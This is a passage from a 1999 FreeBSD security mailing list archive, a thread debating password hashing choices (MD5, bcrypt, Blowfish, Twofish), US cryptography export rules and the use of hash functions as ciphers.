> >This is something i've wanted to know for a long time :).. It should adopt > > > > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > > > > >etc.. OpenBSD has a very good feature with that and it would be great if > > > > >FreeBSD adopted it! :-) > > > > > > > > Make patches > > > > send-pr > > > > > > > > -- > > > > Poul-Henning Kamp FreeBSD coreteam member > > > > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > > > > FreeBSD -- It will take a long time before progress goes too far! > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > Robert N Watson > > > > > > robert@fledge.watson.org http://www.watson.org/~robert/ > > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > > > > > Carnegie Mellon University http://www.cmu.edu/ > > > TIS Labs at Network Associates, Inc. http://www.tis.com/ > > > Safeport Network Services http://www.safeport.com/ > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] > > Harry M. Leitzell - Harry_M_Leitzell@cmu.edu > > Carnegie Mellon University > > Finger for PGP Public Key > > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > Therefore those skilled at the unorthodox are as infinite as heaven and > earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War > > Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 23:22:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id 554C214C9E for ; Sun, 2 May 1999 23:22:29 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id CAA06444; Mon, 3 May 1999 02:05:30 -0400 (EDT) From: "Allen Smith" Message-Id: <9905030205.ZM6442@beatrice.rutgers.edu> Date: Mon, 3 May 1999 02:05:30 -0400 In-Reply-To: Robert Watson "Re: Blowfish/Twofish" (May 3, 1:58am) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Robert Watson , 0x1c Subject: Re: Blowfish/Twofish Cc: freebsd-security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 3, 1:58am, Robert Watson (possibly) wrote: > > I don't believe so, as long as they are not just crypto algorithms. I.e., > I believe our DES hashing is not exportable, whereas our MD5 hashing is. > In a sense, it's all a matter of perspective on how you use an algorithm. > It's all just mathematics, right? Sort of like you can't patent > mathematical formulas, but you can patent algorithms. :) So SHA-1 support > for FreeBSD would be quite exportable, I'd imagine, and would probably > make a worthwhile addition. I don't see Blowfish as a great addition > other than the interoperability concerns expressed previously. > On Mon, 3 May 1999, 0x1c wrote: > > > On a similar note, is there any restriction on one-way hashing algorithms? > > I forget. > > > > Nick One can use any cryptographically secure one-way hash function as a (secret key) encryption method. The procedure is as follows: Sender and recipient have shared secret key K. They want to transmit information I. Sender takes three-bit chunks (the most efficient size) of information I, finds a random salt S of sufficient size for each chunk, and does: hash(K S I-chunk) then sends the result and the random salt to the recipient. Recipient then looks for the 2-bit combination that hashed as above along with the secret and the key gives the result. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 23:25:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id A748014C9E for ; Sun, 2 May 1999 23:25:55 -0700 (PDT) (envelope-from peter.jeremy@auss2.alcatel.com.au) Received: by border.alcanet.com.au id <40332>; Mon, 3 May 1999 16:11:09 +1000 Date: Mon, 3 May 1999 16:25:45 +1000 From: Peter Jeremy Subject: Re: Blowfish/Twofish To: nick@shibumi.feralmonkey.org Cc: freebsd-security@FreeBSD.ORG Message-Id: <99May3.161109est.40332@border.alcanet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 0x1c wrote: >On a similar note, is there any restriction on one-way hashing algorithms? >I forget. AFAIK, there isn't. MD4, MD5, SHA-1 etc appear to be all be freely exportable. The export restrictions appear to be on crypto for `secrecy', whilst crypto for `authentication' is unrestricted. (This does suggest that some lessons in basic cryptography are needed around the US State Department). Note: IANAL and free legal advice is worth what you paid for it. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 23:31:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id 320D315A68 for ; Sun, 2 May 1999 23:31:39 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id CAA06496; Mon, 3 May 1999 02:14:40 -0400 (EDT) From: "Allen Smith" Message-Id: <9905030214.ZM6494@beatrice.rutgers.edu> Date: Mon, 3 May 1999 02:14:40 -0400 In-Reply-To: Peter Jeremy "Re: Blowfish/Twofish" (May 3, 2:09am) References: <99May3.161109est.40332@border.alcanet.com.au> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Peter Jeremy , nick@shibumi.feralmonkey.org Subject: Re: Blowfish/Twofish Cc: freebsd-security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 3, 2:09am, Peter Jeremy (possibly) wrote: > 0x1c wrote: > >On a similar note, is there any restriction on one-way hashing algorithms? > >I forget. > AFAIK, there isn't. MD4, MD5, SHA-1 etc appear to be all be freely > exportable. The export restrictions appear to be on crypto for > `secrecy', whilst crypto for `authentication' is unrestricted. > (This does suggest that some lessons in basic cryptography are > needed around the US State Department). Actually, no... as long as you assume their basic motivation is to limit _convenient_ cryptography. Remember the "cryptographic hooks" nonsense? They're pretty obviously trying to make it as hard as possible/practical for private citizens to use cryptography that the US government can't break. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 23:59:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id F304114DA5 for ; Sun, 2 May 1999 23:59:40 -0700 (PDT) (envelope-from nick@shibumi.feralmonkey.org) Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id RAA03995; Mon, 3 May 1999 17:53:30 GMT (envelope-from nick@shibumi.feralmonkey.org) Date: Mon, 3 May 1999 17:53:29 +0000 (GMT) From: 0x1c To: Robert Watson Cc: freebsd-security@freebsd.org Subject: Re: Blowfish/Twofish In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 3 May 1999, Robert Watson wrote: > > I don't believe so, as long as they are not just crypto algorithms. I.e., > I believe our DES hashing is not exportable, whereas our MD5 hashing is. > In a sense, it's all a matter of perspective on how you use an algorithm. > It's all just mathematics, right? Sort of like you can't patent > mathematical formulas, but you can patent algorithms. :) So SHA-1 support > for FreeBSD would be quite exportable, I'd imagine, and would probably > make a worthwhile addition. I don't see Blowfish as a great addition > other than the interoperability concerns expressed previously. > > Far more important, in my mind, is making the IPsec/IPv6 code part of the > base distribution. If I really want your password, I'll sniff it or > trojan a binary once I have root, something that I already have to have to > get your password file in almost all cases. This has opened up a can of worms the last few times it was raised. Even if IPSec reached a baseline standard, instead of an evolving one, you'd need to choose which camp to integrate from (KAME or erm, NRL?), and ensure that it was available outside the US in a package format or similar. Nick > > On Mon, 3 May 1999, 0x1c wrote: > > > On a similar note, is there any restriction on one-way hashing algorithms? > > I forget. > > > > Nick > > > > On Sat, 1 May 1999, Harry M. Leitzell wrote: > > > > > I am unaware of the restriction laws placed upon the US in terms of > > > encryption. Could someone clarify them for me? > > > > > > 1) If Robert were to write code on a machine that is in a foreign > > > country, would it have been considered exported? (Xterm on a cs.hut.fi > > > machine for example to code in) Even if he is in the US while doing so? > > > > > > 2) Can we still do the moving by paper to another country and > > > scanning it in? Is that legitimate or been deemed illegal? > > > > > > 3) If I write a disk encryptor that sits on the MBR and transfer the > > > disk out of country, is that a no-no? > > > > > > Thanks > > > > > > On Sat, 1 May 1999, Robert Watson wrote: > > > > > > > > > > > So I'd gladly write this code, as well as do a number of other > > > > crypto-related things, but I'm inside the US. Someone outside the US will > > > > have to take this initiative, I'm afraid. > > > > > > > > I'd recommend against using Blowfish--go for Twofish. > > > > > > > > On Sat, 1 May 1999, Poul-Henning Kamp wrote: > > > > > > > > > In message , The Tech-Admin Du > > > > > de writes: > > > > > > > > > > >This is something i've wanted to know for a long time :).. It should adopt > > > > > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > > > > > >etc.. OpenBSD has a very good feature with that and it would be great if > > > > > >FreeBSD adopted it! :-) > > > > > > > > > > Make patches > > > > > send-pr > > > > > > > > > > -- > > > > > Poul-Henning Kamp FreeBSD coreteam member > > > > > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > > > > > FreeBSD -- It will take a long time before progress goes too far! > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > > Robert N Watson > > > > > > > > robert@fledge.watson.org http://www.watson.org/~robert/ > > > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > > > > > > > Carnegie Mellon University http://www.cmu.edu/ > > > > TIS Labs at Network Associates, Inc. http://www.tis.com/ > > > > Safeport Network Services http://www.safeport.com/ > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] > > > Harry M. Leitzell - Harry_M_Leitzell@cmu.edu > > > Carnegie Mellon University > > > Finger for PGP Public Key > > > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > -- > > Therefore those skilled at the unorthodox are as infinite as heaven and > > earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War > > > > > > > Robert N Watson > > robert@fledge.watson.org http://www.watson.org/~robert/ > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > Carnegie Mellon University http://www.cmu.edu/ > TIS Labs at Network Associates, Inc. http://www.tis.com/ > Safeport Network Services http://www.safeport.com/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 0: 8:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 3D8A614F41 for ; Mon, 3 May 1999 00:08:32 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id JAA27207; Mon, 3 May 1999 09:08:31 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id JAA37791; Mon, 3 May 1999 09:08:29 +0200 (MET DST) Date: Mon, 3 May 1999 09:08:29 +0200 From: Eivind Eklund To: Dug Song Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990503090829.N32819@bitbox.follo.net> References: <19990502122142.A289@samurai.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from Dug Song on Sun, May 02, 1999 at 03:48:52PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 03:48:52PM -0400, Dug Song wrote: > On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote: > > > > The point of this exercise would (IMO, at least) only be OpenBSD > > compatibility, where OpenBSD for marketeering reasons has decided to > > use Blowfish as part of their hash algorithm. > > marketeering? read the paper being presented by Niels Provos and David > Mazieres at next month's USENIX (FREENIX track), and decide for yourself - > "A Future-Adaptable Password Scheme": Let me try to write the same as above in a slightly different way: I don't believe the use of Blowfish as a part of the hash algorithm is necessary to achieve the design goals, and I believe it was done in order to show off OpenBSD's ability to include crypto in the core distribution. I may be wrong; it is credible to have done so for convenience reasons, too, if the authors had already developed an extensible cipher based on Blowfish, and did not want to repeat their work or force cryptoanalysis of two systems instead of one. If FreeBSD should switch default password storage hash, my vote would be for something that allowed secure challenges against it - e.g. SRP (which is much more elegant than my own proposal to achieve the same goal, which was based on searching for RSA keys). Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 0:47:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 4EF9814E16 for ; Mon, 3 May 1999 00:47:35 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id JAA27780; Mon, 3 May 1999 09:45:21 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id JAA06767; Mon, 3 May 1999 09:45:11 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Peter Jeremy Cc: adam@homeport.org, freebsd-security@FreeBSD.ORG Cc: provos@openbsd.org, dm@openbsd.org Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Mon, 03 May 1999 12:02:44 +1000." <99May3.114810est.40331@border.alcanet.com.au> Date: Mon, 03 May 1999 09:45:10 +0200 Message-ID: <6765.925717510@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <99May3.114810est.40331@border.alcanet.com.au>, Peter Jeremy writes: >Adam Shostack wrote: >>The reason to not use it for passwords is that the function you want >>(if you're going to not change the model), is a hash function, not a >>block cipher. > >You'd better let Bob Morris know this :-). > >Why can't a block cipher (like, say DES) be used for a password >hashing function? (It can, but we can't export it from the US.) My final comments on this thread will be this: I think you are all overlooking the important bit of the password field as stored in /etc/master.passwd: the "$1$" which starts the field. This is the part that allows us to change the algorithm at any time where we feel the need. I just scanned the http://www.citi.umich.edu/u/provos/papers/bcrypt.ps.gz paper, and they too seem to overlook that the important thing is not to be able to design an algorithm which will last for a thousand years, but the ability to use a new one when we need to. That is not to say that the stuff they've come up with isn't better than what we have, it certainly look a lot more robust. It lacks the stamp of approval for export from the US which MD5 has, but that could probably be arranged too. In difference from virtually all other cryptographic uses, we don't care much about our data (plaintext passwords), we can replace them cheaply and easily, we just don't want anybody (ourselves included) to be able to read them. This is what gives rise to what I call the "Kleenex-method", if our algorithm gets compromised, or even just a credible threat of a weakness, we'll just replace our algorithm *AND OUR DATA* with whatever we feel the best candidate at the time. The worried looks which the paper gives the MD5 acrobatics I wrote are probably fair and just. It has to be remembered that I were not trying to beat the DES based code, but rather the lousy XOR based hash we used for export at the time. I think that I suceeded in beating the DES based code by a huge margin also, and I think that has protected a lot of FreeBSD based systems in the last 5 years from brute-force or dictionary attacks, and I would personally think that the MD5 code can safely last another 3 years. We have the mechanisms inplace for running multiple algorithms already, so I don't see any particular reason to have wild arguments about which one we should use: take your own pick. In the FreeBSD project we have some concerns to address about exportability, but otherwise there are no restrictions. I don't know if we should setup a "registry" for the identifying magic strings ($1$, $2$, $2a$ and so on) to avoid clashes, maybe we could get the IANA to do it for us if we managed to squeze a RFC through the editors. [provos, dm: should we attempt this ?] -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 1:54:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 7431B15614 for ; Mon, 3 May 1999 01:54:23 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:28420 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8033-20164>; Mon, 3 May 1999 10:54:05 +0200 Message-ID: <372D6435.8EF1437A@vangelderen.org> Date: Mon, 03 May 1999 10:54:13 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Adam Shostack Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: <372C19F5.625BB2B@vangelderen.org> <19990502215431.A22973@weathership.homeport.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Adam Shostack wrote: [...] > | In any case, if you recommend against using Blowfish, what's the > | reason? > > The reason not to use Blowfish is (imho) the Pi key scheduling. Key > schedules need to be designed, not taken at random from nature. Uhm, AFAIK the Blowfish keyschedule was designed, it just happens to use digits of Pi as magic numbers. The designers just wanted to err on the safe side and they effectively created a very inefficient one-way 'hash' for keyschedule. They did this because a lot of key schedules were attacked and broken. > The reason to not use it for passwords is that the function you want > (if you're going to not change the model), is a hash function, not a > block cipher. The original recommendation was Twofish over Blowfish. My point was that Twofish is too new to recommend. In any case, you can turn blockciphers into hashes if they can withstand certain kinds of attacks. Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 2:22:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from enst.enst.fr (enst.enst.fr [137.194.2.16]) by hub.freebsd.org (Postfix) with ESMTP id C37E31564C for ; Mon, 3 May 1999 02:22:10 -0700 (PDT) (envelope-from beyssac@enst.fr) Received: from bofh.enst.fr (bofh.enst.fr [137.194.32.191]) by enst.enst.fr (8.9.1a/8.9.1) with ESMTP id LAA19857; Mon, 3 May 1999 11:21:54 +0200 (MET DST) Received: by bofh.enst.fr (Postfix, from userid 12426) id 734EBD223; Mon, 3 May 1999 11:21:54 +0200 (CEST) Message-ID: <19990503112154.A20922@enst.fr> Date: Mon, 3 May 1999 11:21:54 +0200 From: Pierre Beyssac To: Allen Smith , Robert Watson , 0x1c Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: <9905030205.ZM6442@beatrice.rutgers.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <9905030205.ZM6442@beatrice.rutgers.edu>; from Allen Smith on Mon, May 03, 1999 at 02:05:30AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 03, 1999 at 02:05:30AM -0400, Allen Smith wrote: > One can use any cryptographically secure one-way hash function as a > (secret key) encryption method. The procedure is as follows: > > Sender and recipient have shared secret key K. They want to transmit > information I. Sender takes three-bit chunks (the most efficient size) > of information I, finds a random salt S of sufficient size for each There's a simpler way that doesn't requires you to compute several hashes for the same data: simply use your hash function as a pseudo-random generator using the key as a seed, then XOR the resulting stream with your data. However, it seems using this scheme is not recommended by experts in the field, on the assumption that hash functions are not designed to withstand the same kind of attacks as ciphers functions. -- Pierre Beyssac pb@enst.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 3:35:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id 6533B15435 for ; Mon, 3 May 1999 03:35:20 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id GAA01126; Mon, 3 May 1999 06:18:11 -0400 (EDT) From: "Allen Smith" Message-Id: <9905030618.ZM1124@beatrice.rutgers.edu> Date: Mon, 3 May 1999 06:18:11 -0400 In-Reply-To: Pierre Beyssac "Re: Blowfish/Twofish" (May 3, 5:05am) References: <9905030205.ZM6442@beatrice.rutgers.edu> <19990503112154.A20922@enst.fr> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Pierre Beyssac , Robert Watson , 0x1c Subject: Re: Blowfish/Twofish Cc: freebsd-security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 3, 5:05am, Pierre Beyssac (possibly) wrote: > On Mon, May 03, 1999 at 02:05:30AM -0400, Allen Smith wrote: > > One can use any cryptographically secure one-way hash function as a > > (secret key) encryption method. The procedure is as follows: > > > > Sender and recipient have shared secret key K. They want to transmit > > information I. Sender takes three-bit chunks (the most efficient size) > > of information I, finds a random salt S of sufficient size for each > > There's a simpler way that doesn't requires you to compute several > hashes for the same data: simply use your hash function as a > pseudo-random generator using the key as a seed, then XOR the > resulting stream with your data. > > However, it seems using this scheme is not recommended by experts > in the field, on the assumption that hash functions are not designed > to withstand the same kind of attacks as ciphers functions. True... because what makes a cryptographically secure hash is: A. you can't figure out the input from the output; and B. the output is evenly distributed over the input space (it isn't all clumped up). Neither of these mean that you can't figure out the output if you know the input, or some portion of it (i.e., the previous output of the hash function). -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 7: 6:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (Postfix) with ESMTP id 8DB2B15136 for ; Mon, 3 May 1999 07:06:02 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id KAA25736; Mon, 3 May 1999 10:22:20 -0400 (EDT) Date: Mon, 3 May 1999 10:22:20 -0400 From: Adam Shostack To: Peter Jeremy Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990503102220.A25694@weathership.homeport.org> References: <99May3.114810est.40331@border.alcanet.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <99May3.114810est.40331@border.alcanet.com.au>; from Peter Jeremy on Mon, May 03, 1999 at 12:02:44PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 03, 1999 at 12:02:44PM +1000, Peter Jeremy wrote: | Adam Shostack wrote: | >The reason to not use it for passwords is that the function you want | >(if you're going to not change the model), is a hash function, not a | >block cipher. | | You'd better let Bob Morris know this :-). | | Why can't a block cipher (like, say DES) be used for a password | hashing function? (I realise that the DES used for Unix password | hashing is `tweaked', but that was done solely to prevent people using | off-the-shelf DES hardware to crack passwords - the salt can be | injected in several other ways). It can, but when you want irreversability, its useful to use a function designed with that in mind. The fact that you can use block ciphers as hashes, and hashes as block ciphers, does not mean that its a good idea to go around doing so. It means that the theoreticians in the field are working out how they interact. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 8: 4: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 04BF914E0F for ; Mon, 3 May 1999 08:04:00 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.8.8) id LAA21305; Mon, 3 May 1999 11:03:55 -0400 (EDT) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199905031503.LAA21305@cc942873-a.ewndsr1.nj.home.com> Subject: Re: Blowfish/Twofish In-Reply-To: <9905030214.ZM6494@beatrice.rutgers.edu> from Allen Smith at "May 3, 99 02:14:40 am" To: easmith@beatrice.rutgers.edu (Allen Smith) Date: Mon, 3 May 1999 11:03:55 -0400 (EDT) Cc: peter.jeremy@auss2.alcatel.com.au, nick@shibumi.feralmonkey.org, freebsd-security@FreeBSD.ORG Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Allen Smith wrote, > On May 3, 2:09am, Peter Jeremy (possibly) wrote: > > 0x1c wrote: > > >On a similar note, is there any restriction on one-way hashing algorithms? > > >I forget. > > AFAIK, there isn't. MD4, MD5, SHA-1 etc appear to be all be freely > > exportable. The export restrictions appear to be on crypto for > > `secrecy', whilst crypto for `authentication' is unrestricted. > > (This does suggest that some lessons in basic cryptography are > > needed around the US State Department). > > Actually, no... as long as you assume their basic motivation is to > limit _convenient_ cryptography. Remember the "cryptographic hooks" > nonsense? They're pretty obviously trying to make it as hard as > possible/practical for private citizens to use cryptography that the US > government can't break. I've always accepted the point of view from Press, Flannery, Teukolsky, and Vettering from _Numerical Recipes in C_ when they talk about DES, "A key controversial question is whether the NSA purposefully weakened the algorithm [DES], so that is had vulnerabilities significant enough to be exploited by NSA's own multi-billion dollar resources, but not so significant as to be exploitable by someone else. For our purposes we hardly need to know the answer to this: A random number generator whose deviations from randomness can be discerned only by concerted attack with resources comparable to NSA -- that random number generator should surely be contender for "World's Best" title." The moral of the story being, if the US governement, wants your data bad enough... they _are_ going to get it. Just as the government can only make it inconvenient for private citizens (in the US or foreign, the ones NSA is interested in) to use encryption; the private citizens (or again, NSA is most concerned with foreign governements) can really only make it inconvenient for the US governement to decrypt it. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 9: 0:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from reeducation-labor.lcs.mit.edu (reeducation-labor.lcs.mit.edu [18.26.4.10]) by hub.freebsd.org (Postfix) with ESMTP id 8460815235 for ; Mon, 3 May 1999 09:00:11 -0700 (PDT) (envelope-from dm@reeducation-labor.lcs.mit.edu) Received: (from dm@localhost) by reeducation-labor.lcs.mit.edu (8.9.3/8.8.7) id LAA09846; Mon, 3 May 1999 11:54:48 -0400 (EDT) Date: Mon, 3 May 1999 11:54:48 -0400 (EDT) Message-Id: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu> From: David Mazieres To: phk@critter.freebsd.dk Cc: peter.jeremy@auss2.alcatel.com.au, adam@homeport.org, freebsd-security@FreeBSD.ORG, provos@openbsd.org In-reply-to: <6765.925717510@critter.freebsd.dk> (message from Poul-Henning Kamp on Mon, 03 May 1999 09:45:10 +0200) Subject: Re: Blowfish/Twofish References: <6765.925717510@critter.freebsd.dk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > cc: adam@homeport.org, freebsd-security@FreeBSD.ORG > cc: provos@openbsd.org, dm@openbsd.org > Date: Mon, 03 May 1999 09:45:10 +0200 > From: Poul-Henning Kamp > > My final comments on this thread will be this: > > I think you are all overlooking the important bit of the password > field as stored in /etc/master.passwd: the "$1$" which starts the > field. This is the part that allows us to change the algorithm at > any time where we feel the need. Well, I missed the beginning of the thread, but just got CCed on this, so I will respond. First of all, the 